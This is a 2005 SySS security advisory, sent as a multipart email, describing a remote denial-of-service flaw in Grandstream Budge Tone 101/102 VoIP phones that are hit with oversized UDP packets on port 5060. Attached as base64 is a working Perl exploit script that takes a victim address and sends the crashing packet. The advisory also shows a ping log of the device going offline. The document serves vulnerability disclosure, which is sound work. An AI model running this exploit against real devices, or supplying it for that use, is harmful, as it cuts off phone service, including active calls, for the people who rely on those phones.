It is possible to denial of service the Grandstream Budge Tone 101/102 VOIP phone by sending a UDP packet greater than 65534 bytes to port 5060.
971cc3bd262ee40b619f72fff70b663892cee3f5753cc1d34ac499a8a70ac909
--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
- -------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
- -------------------------------------------------------------------
Problem discovered: July 20th 2005
Vendor contacted: July 21th 2005
Advisory will published on: August 12th 2005
AUTHOR: Pierre Kroma (kroma@syss.de)
SySS GmbH
72070 Tuebingen / Germany
Tel.: +49-7071-407856-0
Key fingerprint =3D 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC
DEVICE: Grandstream Budge Tone-101
Grandstream Budge Tone-102
AFFECTED VERSIONS: perhaps all(?) <=3D 1.0.6.7 (firmware 1.0.6.7 tested)
EXPLOIT: attached
VENDOR STATUS: informed
SEVERITY: medium
Remotely exploitable: yes
DESCRIPTION:
It is possible to initiate a D.o.S attack against this voip
(hardware-)phone. If you send an UDP packet greater than 65534 bytes=20
to port 5060 the device stops working:
- any active telephone call will be aborted.
- the display will show nothing / display freeze.
- the integrated HTTP-server won't be reachable any more.
To solve the problem, you must switch the phone off and on again.
If you send a packet of exactly 65534 bytes the device may reboot.
Smaller packets have no effect.
############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)
ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D1 ttl=3D250 time=3D0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D2 ttl=3D250 time=3D0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D3 ttl=3D250 time=3D0.404 ms
--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev =3D 0.404/0.429/0.479/0.042 ms
Wait ...
ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################
--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: application/x-perl; name=grandstream-DoS.pl
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=grandstream-DoS.pl
IyEvdXNyL2Jpbi9wZXJsCiMKdXNlIElPOjpTb2NrZXQ7CnVzZSBUZXJtOjpBTlNJQ29sb3I7Cgoj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFUgUyBBIEcgRSAjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIwpzeXN0ZW0gKCJjbGVhciIpOwpwcmludCAiXG5HcmFuZHN0cmVhbSBC
VDEwMS9CVDEwMiBEb1NcbiI7CnByaW50ICJ3cml0dGVuIGJ5IHBpZXJyZSBrcm9tYSAoa3JvbWFc
QHN5c3MuZGUpXG5cbiI7CgppZiAoISRBUkdWWzJdKXsKcHJpbnQgcXF+ClVzYWdlOiBwZXJsIGdy
YW5kc3RyZWFtLURvUy5wbCAtcyA8aXAtYWRkcj4gPHVkcC1wb3J0PiB7LXIvLXN9CgoJPGlwLWFk
ZHI+ICA9IDstKQoJPHVkcC1wb3J0PiA9IDUwNjAKCgktciA9ICdyZWJvb3QnIAl0aGUgR3JhbmRz
dHJlYW0gQlQgMTAxLzEwMgoJLXMgPSAnc2h1dGRvd24nIHRoZSBHcmFuZHN0cmVhbSBCVCAxMDEv
MTAyCgp+OyBleGl0O30KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBEIEUgRiBJ
IE4gSSBUIEkgTyBOIFMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKJHZpY3RpbSA9ICRBUkdWWzBdOwok
cG9ydCA9ICRBUkdWWzFdOwokb3B0aW9uID0gJEFSR1ZbMl07CgppZiAoICRvcHRpb24gPT0gJ3In
IHx8ICRvcHRpb24gPT0gJ1InICkKewkkcmVxdWVzdD0gJ2sneDY1NTM0O30KCmlmICggJG9wdGlv
biA9PSAncycgfHwgJG9wdGlvbiA9PSAnUycgKQp7CSRyZXF1ZXN0PSAncCd4NjU1MzU7fQplbHNl
CnsJcHJpbnQgIldyb25nIHBhcmFtZXRlciAtIHRyeSBpdCBhZ2FpbiI7CglleGl0Owp9CgoKIyBw
aW5nIHRoZSByZW1vdGUgZGV2aWNlCnByaW50IGNvbG9yICdib2xkIGJsdWUnOwpwcmludCAiXG5w
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW1cbiI7CnByaW50IGNvbG9yICdyZXNldCc7CnN5
c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCnByaW50IGNvbG9yICdib2xkIHJlZCc7CnByaW50
ICJcbiBXYWl0IC4uLiBcblxuXG4iOwpwcmludCBjb2xvciAncmVzZXQnOwokc294ID0gSU86OlNv
Y2tldDo6SU5FVC0+bmV3KFByb3RvPT4idWRwIixQZWVyUG9ydD0+IiRwb3J0IixQZWVyQWRkcj0+
IiR2aWN0aW0iKTsKCnByaW50ICRzb3ggJHJlcXVlc3Q7CnNsZWVwIDE7CmNsb3NlICRzb3g7Cgoj
IHBpbmcgdGhlIHJlbW90ZSBkZXZpY2UKcHJpbnQgY29sb3IgJ2JvbGQgYmx1ZSc7CnByaW50ICJw
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW0gYWdhaW5cbiI7CnByaW50IGNvbG9yICdyZXNl
dCc7CnN5c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCg==
--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL--